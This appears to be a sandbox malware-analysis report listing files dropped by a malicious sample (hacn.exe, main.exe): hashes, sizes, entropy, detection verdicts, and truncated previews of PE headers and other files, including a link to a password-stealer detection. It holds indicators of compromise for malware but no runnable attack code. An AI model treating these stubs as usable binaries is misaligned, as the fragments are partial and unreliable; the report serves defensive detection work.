                                                                                                                                        SHA-256:BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
                                                                                                                                        SHA-512:A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................
                                                                                                                                        Process:C:\ProgramData\main.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1678
                                                                                                                                        Entropy (8bit):5.369913341429046
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:MxHKQwYHKGSI6ogLHitHTHhAHKKkyHpHNp51qHGIs0HKD:iqbYqGSI6ogLCtzHeqKkyJtp5wmj0qD
                                                                                                                                        MD5:47EF549ED9A6077539E2B7E16049BF8F
                                                                                                                                        SHA1:2129E12D767465A7F083AB906EB481DB88B47D0E
                                                                                                                                        SHA-256:ABACC0BCEB0B100C7FDC2DDDF3CDDCCB8C048466FD886D0A015AB49D5B0A38A7
                                                                                                                                        SHA-512:EB77CA4097CD1F268E6462D7FA3F864700B7113A637C755FCFF843A01DE6088A7B3588D2CFD1C6C9F018E93783019E338793E7EC5FC29BDBCE6E6604AEB91A99
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKey
                                                                                                                                        Process:C:\Windows\System32\lsass.exe
                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):1
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3::
                                                                                                                                        MD5:93B885ADFE0DA089CDF634904FD59F71
                                                                                                                                        SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                                                                                                        SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                                                                                                        SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:.
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):64
                                                                                                                                        Entropy (8bit):1.1940658735648508
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:Nlllul3nqth:NllUa
                                                                                                                                        MD5:851531B4FD612B0BC7891B3F401A478F
                                                                                                                                        SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                                                                                                        SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                                                                                                        SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:@...e.................................&..............@..........
                                                                                                                                        Process:C:\ProgramData\main.exe
                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1829040
                                                                                                                                        Entropy (8bit):6.564424655402829
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:49152:c9EeNSPwEW3cFSI4Tfm3hvbHsjAJcAMkP3:c9Nzm31PMo3
                                                                                                                                        MD5:65CCD6ECB99899083D43F7C24EB8F869
                                                                                                                                        SHA1:27037A9470CC5ED177C0B6688495F3A51996A023
                                                                                                                                        SHA-256:ABA67C7E6C01856838B8BC6B0BA95E864E1FDCB3750AA7CDC1BC73511CEA6FE4
                                                                                                                                        SHA-512:533900861FE36CF78B614D6A7CE741FF1172B41CBD5644B4A9542E6CA42702E6FBFB12F0FBAAE8F5992320870A15E90B4F7BF180705FC9839DB433413860BE6D
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Joe Sandbox View:
                                                                                                                                        • Filename: conhost.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nN\.. ... ... .Q..... .Q...e. .Q..... ..Q#... ..Q%... ..Q$... .8..... ..].... ...!.~. .rQ(... .rQ ... .wQ.... .rQ"... .Rich.. .........................PE..d.....d.........." ................................................................6U....`.................................................P...x................!.......T...........@..p............................A...............................................text...0........................... ..`.rdata...1.......2..................@..@.data....`... ...J..................@....pdata...!......."...P..............@..@.gfids...............r..............@..@.rsrc................t..............@..@.reloc...............~..............@..B................................................................................................................................................................................
                                                                                                                                        Process:C:\Users\user\Desktop\hacn.exe
                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):98224
                                                                                                                                        Entropy (8bit):6.452201564717313
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
                                                                                                                                        MD5:F34EB034AA4A9735218686590CBA2E8B
                                                                                                                                        SHA1:2BC20ACDCB201676B77A66FA7EC6B53FA2644713
                                                                                                                                        SHA-256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
                                                                                                                                        SHA-512:D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Joe Sandbox View:
                                                                                                                                        • Filename: , Detection: malicious, Browse
                                                                                                                                        • Filename: SecuriteInfo.com.Trojan.PWS.Stealer.38408.30550.27254.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: tts.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: SecuriteInfo.com.Python.Muldrop.25.8678.4056.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: gG5vKnBFax.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: 47YnqNpB7R.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: OPPVXcEaPW.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: SecuriteInfo.com.W64.S-8cfa6ebc.Eldorado.16653.18215.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: tOCTdBymcy.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: PpQMwNh.exe, Detection: malicious, Browse
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Users\user\Desktop\hacn.exe
                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):83736
                                                                                                                                        Entropy (8bit):6.595094797707322
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:hXOz78ZqjUyAsIi7W/5+D8W35mjZm35ILCVM7SyfYPxe:pOzwpyAFi7WMgW34jZm35ILCVMZoxe
                                                                                                                                        MD5:86D1B2A9070CD7D52124126A357FF067
                                                                                                                                        SHA1:18E30446FE51CED706F62C3544A8C8FDC08DE503
                                                                                                                                        SHA-256:62173A8FADD4BF4DD71AB89EA718754AA31620244372F0C5BBBAE102E641A60E
                                                                                                                                        SHA-512:7DB4B7E0C518A02AE901F4B24E3860122ACC67E38E73F98F993FE99EB20BB3AA539DB1ED40E63D6021861B54F34A5F5A364907FFD7DA182ADEA68BBDD5C2B535
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.>...m...m...m.}<m...m.p.l...m.jRm...m.p.l...m.p.l...m.p.l...mup.l...m.}.l...m...m...mup.l...mup.l...mupPm...mup.l...mRich...m................PE..d.....,d.........." .........\..............................................P............`......................................... ...H...h........0....... ..,......../...@......`...T...............................8............................................text.............................. ..`.rdata...=.......>..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Users\user\Desktop\hacn.exe
                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):254744
                                                                                                                                        Entropy (8bit):6.564308911485739
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6144:3LT2sto29vTlN5cdIKdo4/3VaV8FlBa9qWMa3pLW1A/T8O51j4iab9M:H2s/9vTlPcdk4vVtFU98iIu
                                                                                                                                        MD5:20C77203DDF9FF2FF96D6D11DEA2EDCF
                                                                                                                                        SHA1:0D660B8D1161E72C993C6E2AB0292A409F6379A5
                                                                                                                                        SHA-256:9AAC010A424C757C434C460C3C0A6515D7720966AB64BAD667539282A17B4133
                                                                                                                                        SHA-512:2B24346ECE2CBD1E9472A0E70768A8B4A5D2C12B3D83934F22EBDC9392D9023DCB44D2322ADA9EDBE2EB0E2C01B5742D2A83FA57CA23054080909EC6EB7CF3CA
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........76..VX..VX..VX.....VX..#Y..VX..#]..VX..#\..VX..#[..VX.t#Y..VX...Y..VX..VY.+VX.t#[..VX.t#U..VX.t#X..VX.t#...VX.t#Z..VX.Rich.VX.........................PE..d.....,d.........." .....|...:.......................................................r....`..........................................T..P...0U...................'......./......<...0...T...............................8............................................text....{.......|.................. ..`.rdata..............................@..@.data....)...p...$...X..............@....pdata...'.......(...|..............@..@.rsrc...............................@..@.reloc..<...........................@..B........................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Users\user\Desktop\hacn.exe
                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):64792
                                                                                                                                        Entropy (8bit):6.223467179037751
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:/smKJPganCspF1dqZAC2QjP2RILOIld7SyEPxDF:/smKpgNoF1dqZDnjP2RILOIv2xB
                                                                                                                                        MD5:D4674750C732F0DB4C4DD6A83A9124FE
                                                                                                                                        SHA1:FD8D76817ABC847BB8359A7C268ACADA9D26BFD5
                                                                                                                                        SHA-256:CAA4D2F8795E9A55E128409CC016E2CC5C694CB026D7058FC561E4DD131ED1C9
                                                                                                                                        SHA-512:97D57CFB80DD9DD822F2F30F836E13A52F771EE8485BC0FD29236882970F6BFBDFAAC3F2E333BBA5C25C20255E8C0F5AD82D8BC8A6B6E2F7A07EA94A9149C81E
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..b?..b?..b?......b?..>..b?..:..b?..;..b?..<..b?.2.>..b?..>..b?.7.>..b?..b>.pb?.2.2..b?.2.?..b?.2....b?.2.=..b?.Rich.b?.........PE..d.....,d.........." .....P...........<....................................................`............................................P...0............................/......T....k..T............................k..8............`.. ............................text....N.......P.................. ..`.rdata..4P...`...R...T..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Users\user\Desktop\hacn.exe
                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):158488
                                                                                                                                        Entropy (8bit):6.8491143497239655
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3072:j0k3SXjD9aWpAn3rb7SbuDlvNgS4fWqEznfo9mNoFTSlXZ8Ax5ILZ1GIxq:j0kiXjD9v8X7Euk4wYOFTafxn
                                                                                                                                        MD5:7447EFD8D71E8A1929BE0FAC722B42DC
                                                                                                                                        SHA1:6080C1B84C2DCBF03DCC2D95306615FF5FCE49A6
                                                                                                                                        SHA-256:60793C8592193CFBD00FD3E5263BE4315D650BA4F9E4FDA9C45A10642FD998BE
                                                                                                                                        SHA-512:C6295D45ED6C4F7534C1A38D47DDC55FEA8B9F62BBDC0743E4D22E8AD0484984F8AB077B73E683D0A92D11BF6588A1AE395456CFA57DA94BB2A6C4A1B07984DE
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.M...M...M...D..I.......O.......F.......E.......N.......N.......O...M...(.......w.......L.......L.......L...RichM...................PE..d...&.,d.........." .....`..........p3...............................................4....`.............................................L.......x....`.......@.......<.../...p..D...H{..T............................{..8............p...............................text....^.......`.................. ..`.rdata.......p.......d..............@..@.data........0......................@....pdata.......@......................@..@.rsrc........`.......0..............@..@.reloc..D....p.......:..............@..B........................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Users\user\Desktop\hacn.exe
                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):79128
                                                                                                                                        Entropy (8bit):6.284790077237953
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:ZmtvsXhgzrojAs9/s+S+pGLypbyxk/DDTBVILLwX7SyiPx9:c56OzyAs9/sT+pGLypb+k/XFVILLwX4f
                                                                                                                                        MD5:819166054FEC07EFCD1062F13C2147EE
                                                                                                                                        SHA1:93868EBCD6E013FDA9CD96D8065A1D70A66A2A26
                                                                                                                                        SHA-256:E6DEB751039CD5424A139708475CE83F9C042D43E650765A716CB4A924B07E4F
                                                                                                                                        SHA-512:DA3A440C94CB99B8AF7D2BC8F8F0631AE9C112BD04BADF200EDBF7EA0C48D012843B4A9FB9F1E6D3A9674FD3D4EB6F0FA78FD1121FAD1F01F3B981028538B666
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~...:...:...:...3.i.<...h...8...h...6...h...2...h...9.......8...:.......q...=.......;.......;.......;.......;...Rich:...........PE..d.....,d.........." .....l...........%.......................................P............`.............................................P............0....... ..<......../...@..........T..............................8............................................text...fj.......l.................. ..`.rdata..Ts.......t...p..............@..@.data...............................@....pdata..<.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Users\user\Desktop\hacn.exe
                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):880569
                                                                                                                                        Entropy (8bit):5.682993312079324
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12288:cgYJu4KXWyBC6S4IEa8A4a2YWD3dOVwx/fpEWertSLMN+:cgYJiVBFLa2VIVwx/fpEWe+MN+
                                                                                                                                        MD5:C4989BCEB9E7E83078812C9532BAEEA7
                                                                                                                                        SHA1:AAFB66EBDB5EDC327D7CB6632EB80742BE1AD2EB
                                                                                                                                        SHA-256:A0F5C7F0BAC1EA9DC86D60D20F903CC42CFF3F21737426D69D47909FC28B6DCD
                                                                                                                                        SHA-512:FB6D431D0F2C8543AF8DF242337797F981D108755712EC6C134D451AA777D377DF085B4046970CC5AC0991922DDF1F37445A51BE1A63EF46B0D80841222FB671
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:PK..........!..,..5...5......._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF
                                                                                                                                        Process:C:\Users\user\Desktop\hacn.exe
                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):3450648
                                                                                                                                        Entropy (8bit):6.098075450035195
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:98304:YP+uemAdn67xfxw6rKsK1CPwDv3uFfJz1CmiX:OZemAYxfxw6HK1CPwDv3uFfJzUmA
                                                                                                                                        MD5:9D7A0C99256C50AFD5B0560BA2548930
                                                                                                                                        SHA1:76BD9F13597A46F5283AA35C30B53C21976D0824
                                                                                                                                        SHA-256:9B7B4A0AD212095A8C2E35C71694D8A1764CD72A829E8E17C8AFE3A55F147939
                                                                                                                                        SHA-512:CB39AA99B9D98C735FDACF1C5ED68A4D09D11F30262B91F6AA48C3F8520EFF95E499400D0CE7E280CA7A90FF6D7141D2D893EF0B33A8803A1CADB28BA9A9E3E2
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..$.................................................. 5......%5...`.........................................../..h...Z4.@.....4.|.....2......x4../....4..O....-.8.............................-.@............P4..............................text.....$.......$................. ..`.rdata..&.....%.......$.............@..@.data...!z....2..,....1.............@....pdata........2.......2.............@..@.idata..^#...P4..$....3.............@..@.00cfg..u.....4.......3.............@..@.rsrc...|.....4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................
                                                                                                                                        Process:C:\Users\user\Desktop\hacn.exe
                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):4458776
                                                                                                                                        Entropy (8bit):6.460390021076921
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:49152:myrXfGIy+Bqk5c5Ad2nwZT3Q6wsV136cR2DZvbK30xLNZcAgVBvcpYcvl1IDWbH3:Uw5tVBlicWdvoDkHUMF7Ph/qe
                                                                                                                                        MD5:63A1FA9259A35EAEAC04174CECB90048
                                                                                                                                        SHA1:0DC0C91BCD6F69B80DCDD7E4020365DD7853885A
                                                                                                                                        SHA-256:14B06796F288BC6599E458FB23A944AB0C843E9868058F02A91D4606533505ED
                                                                                                                                        SHA-512:896CAA053F48B1E4102E0F41A7D13D932A746EEA69A894AE564EF5A84EF50890514DECA6496E915AAE40A500955220DBC1B1016FE0B8BCDDE0AD81B2917DEA8B
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." .....V#..v!...............................................E.....".D...`.........................................`.<.....@.=.|.....D......`B.......C../....D..t....$.T...........................P.$.8............p#.8............................text...bT#......V#................. ..`.rdata...B...p#..D...Z#.............@..@.data... .....=.......=.............@....pdata.......`B......HA.............@..@PyRuntim`....pD......VC.............@....rsrc.........D......ZC.............@..@.reloc...t....D..v...dC.............@..B........................................................................................................................................................................................
                                                                                                                                        Process:C:\Users\user\Desktop\hacn.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):7619102
                                                                                                                                        Entropy (8bit):7.992191224394449
                                                                                                                                        Encrypted:true
                                                                                                                                        SSDEEP:196608:96zi+UrgcJ2UTbNI4S+idsx5rqG1fm3josxH5l9cgFacVm6:96zi+UrJcWJN+jtxH5vFaiP
                                                                                                                                        MD5:232B5DBB1510598F8A683DD2752A99C4
                                                                                                                                        SHA1:049482CA00718F56B610C3430F2048FEB2823A01
                                                                                                                                        SHA-256:77FC8CE7D3439EDFB9677D665E48D9EFAB28629C271FF678387661BDBEAE1F82
                                                                                                                                        SHA-512:9492D3BED063CCDF77398B32C8D77F3B85003E6C3B76A3878492727C157026EC77A1A1349E1C7C901F15FE19F822DA314C602C9D49460AD0F9C1B43596851A71
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................`............@.........................p...4.......P....@..P....................0..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc...P....@......................@..@.reloc..<#...0...$..................@..B................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Users\user\Desktop\hacn.exe
                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):29976
                                                                                                                                        Entropy (8bit):6.627859470728624
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:768:gUC2hwhVHqOmEVILQG35YiSyvrYPxWEl6:FC2ehVKOmEVILQGp7SyEPxe
                                                                                                                                        MD5:A653F35D05D2F6DEBC5D34DADDD3DFA1
                                                                                                                                        SHA1:1A2CEEC28EA44388F412420425665C3781AF2435
                                                                                                                                        SHA-256:DB85F2F94D4994283E1055057372594538AE11020389D966E45607413851D9E9
                                                                                                                                        SHA-512:5AEDE99C3BE25B1A962261B183AE7A7FB92CB0CB866065DC9CD7BB5FF6F41CC8813D2CC9DE54670A27B3AD07A33B833EAA95A5B46DAD7763CA97DFA0C1CE54C9
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!.F.O.F.O.F.O.O...D.O...N.D.O...J.M.O...K.N.O...L.B.O...N.D.O.F.N...O...N.C.O...B.G.O...O.G.O....G.O...M.G.O.RichF.O.................PE..d.....,d.........." .........0......................................................;\....`.........................................`@..L....@..x....p.......`.......F.../......H....2..T............................2..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata.......`.......6..............@..@.rsrc........p.......:..............@..@.reloc..H............D..............@..B........................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Users\user\Desktop\hacn.exe
                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1123608
                                                                                                                                        Entropy (8bit):5.3853088605790385
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12288:6mwlRMmuZ63NTQCb5Pfhnzr0ql8L8kcM7IRG5eeme6VZyrIBHdQLhfFE+uQfk:ulRuUZV0m8UMMREtV6Vo4uYQfk
                                                                                                                                        MD5:81D62AD36CBDDB4E57A91018F3C0816E
                                                                                                                                        SHA1:FE4A4FC35DF240B50DB22B35824E4826059A807B
                                                                                                                                        SHA-256:1FB2D66C056F69E8BBDD8C6C910E72697874DAE680264F8FB4B4DF19AF98AA2E
                                                                                                                                        SHA-512:7D15D741378E671591356DFAAD4E1E03D3F5456CBDF87579B61D02A4A52AB9B6ECBFFAD3274CEDE8C876EA19EAEB8BA4372AD5986744D430A29F50B9CAFFB75D
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)|.K(.eJ)..K(.eJ).eK).eJ)|.G(.eJ)|.J(.eJ)|..).eJ)|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....B.......... *.......................................@......Q.....`.............................................X............ ..........H......../...0.......`..T........................... a..8............`..x............................text...9A.......B.................. ..`.rdata.......`.......F..............@..@.data...............................@....pdata..H...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):60
                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):60
                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
